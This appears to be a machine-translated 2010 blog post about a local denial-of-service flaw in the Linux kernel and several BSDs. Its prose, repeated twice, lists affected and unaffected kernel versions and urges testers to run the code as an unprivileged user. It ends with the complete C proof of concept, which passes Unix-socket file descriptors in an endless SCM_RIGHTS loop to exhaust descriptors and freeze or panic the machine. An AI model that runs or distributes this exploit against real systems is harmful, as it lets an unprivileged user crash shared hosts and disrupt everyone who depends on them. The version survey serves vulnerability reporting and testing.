November 25, 2010 at 23:05Local vulnerability in the Linux kernel (and not only), DoS
Published code that causes the computer to freeze (100% load of all cores, exhaustion of file descriptors).
Link to code: lkml.org/lkml/2010/11/25/8
Checked at 27, 32 - the hang is playing. 32/64 bits.
I clarify: after 1-2 seconds the crash dump flies (I do not have time to read), the host is overloaded. In another test, the system crashed after the program ended (after about 5-7 seconds).
PS Experts from the ENT sector say that FreeBSD 8.1 also crashes.
PPS Suddenly - on CentOS 5.5 since 2.6.18 it does not crash. If run from the root, drops, from the user - just quietly fulfills. In this case, the root in the neighboring console does not interfere with work and the system does not crash.
Trying to clarify the situation:
1) CentOS 2.6.18 / 64 with non-privileged user is not affected.
2) Debian Squeeze 2.6.34 / 64 with an unprivileged user is exposed (kernel panic).
3) According to rumors, it was possible to reproduce in some FreeBSD (from comments - FreeBSD 8.2-PRERELEASE cannot be reproduced)
4) From comments - it was not possible to reproduce on Ubuntu 2.6.32 / 64, it is reproduced on 2.6.36.
5) Ubuntu 2.6.34 / 64 - plays
6) From the comments - RHEL5.5 does not freeze, but it slows down and prevents to kill the process.
7) From the comments: FreeBSD 4.11, 8.1, OpebBSD 4.6, 4.8, DragonFLY BSD 2.8.0 - affected
8) OpenVZ + 2.6.18 Debian / Centos - not playable.
PPPS for those who test - it is necessary to start from the non-privileged user.
Test text:
Link to code: lkml.org/lkml/2010/11/25/8
Checked at 27, 32 - the hang is playing. 32/64 bits.
I clarify: after 1-2 seconds the crash dump flies (I do not have time to read), the host is overloaded. In another test, the system crashed after the program ended (after about 5-7 seconds).
PS Experts from the ENT sector say that FreeBSD 8.1 also crashes.
PPS Suddenly - on CentOS 5.5 since 2.6.18 it does not crash. If run from the root, drops, from the user - just quietly fulfills. In this case, the root in the neighboring console does not interfere with work and the system does not crash.
Trying to clarify the situation:
1) CentOS 2.6.18 / 64 with non-privileged user is not affected.
2) Debian Squeeze 2.6.34 / 64 with an unprivileged user is exposed (kernel panic).
3) According to rumors, it was possible to reproduce in some FreeBSD (from comments - FreeBSD 8.2-PRERELEASE cannot be reproduced)
4) From comments - it was not possible to reproduce on Ubuntu 2.6.32 / 64, it is reproduced on 2.6.36.
5) Ubuntu 2.6.34 / 64 - plays
6) From the comments - RHEL5.5 does not freeze, but it slows down and prevents to kill the process.
7) From the comments: FreeBSD 4.11, 8.1, OpebBSD 4.6, 4.8, DragonFLY BSD 2.8.0 - affected
8) OpenVZ + 2.6.18 Debian / Centos - not playable.
PPPS for those who test - it is necessary to start from the non-privileged user.
Test text:
#include#include static int send_fd (int unix_fd, int fd) { struct msghdr msgh; struct cmsghdr * cmsg; char buf [CMSG_SPACE (sizeof (fd))]; memset (& msgh, 0, sizeof (msgh)); memset (buf, 0, sizeof (buf)); msgh.msg_control = buf; msgh.msg_controllen = sizeof (buf); cmsg = CMSG_FIRSTHDR (& msgh); cmsg-> cmsg_len = CMSG_LEN (sizeof (fd)); cmsg-> cmsg_level = SOL_SOCKET; cmsg-> cmsg_type = SCM_RIGHTS; msgh.msg_controllen = cmsg-> cmsg_len; memcpy (CMSG_DATA (cmsg), & fd, sizeof (fd)); return sendmsg (unix_fd, & msgh, 0); } int main () { int fd [2], ff [2]; int target; if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd) == - 1) return 1; for (;;) { if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff) == - 1) return 2; send_fd (ff [0], fd [0]); send_fd (ff [0], fd [1]); close (fd [1]); close (fd [0]); fd [0] = ff [0]; fd [1] = ff [1]; } }